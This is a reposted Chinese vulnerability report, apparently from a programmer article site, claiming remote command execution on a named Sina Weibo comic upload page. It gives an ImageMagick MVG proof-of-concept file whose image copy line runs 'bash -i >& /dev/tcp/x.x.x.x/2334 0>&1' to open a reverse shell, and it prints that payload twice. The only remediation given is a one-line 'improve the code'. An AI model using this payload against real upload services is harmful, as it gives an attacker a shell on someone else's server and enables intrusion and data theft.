欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

新浪微博某处远程命令执行漏洞(可反弹shell操作服务器)

程序员文章站 2022-03-19 11:21:28
RT 来到这里https://manhua.weibo.com/space/upload_comic 上传poc push graphic-context viewbox 0 0 64...

RT

来到这里https://manhua.weibo.com/space/upload_comic

上传poc

push graphic-context

viewbox 0 0 640 480

image copy 200,200 100,100 "|bash -i >& /dev/tcp/x.x.x.x/2334 0>&1"

pop graphic-context

 

新浪微博某处远程命令执行漏洞(可反弹shell操作服务器)

 

反弹一波

 

新浪微博某处远程命令执行漏洞(可反弹shell操作服务器)

 

来到这里https://manhua.weibo.com/space/upload_comic

上传poc

push graphic-context

viewbox 0 0 640 480

image copy 200,200 100,100 "|bash -i >& /dev/tcp/x.x.x.x/2334 0>&1"

pop graphic-context

 

新浪微博某处远程命令执行漏洞(可反弹shell操作服务器)

 

反弹一波

 

新浪微博某处远程命令执行漏洞(可反弹shell操作服务器)

 

解决方案:

完善代码

上一篇: 国产新超算推迟?弃Intel换自主CPU 性能倍增

下一篇: 在Android项目里如何调用基于百度地图API实现定位

推荐阅读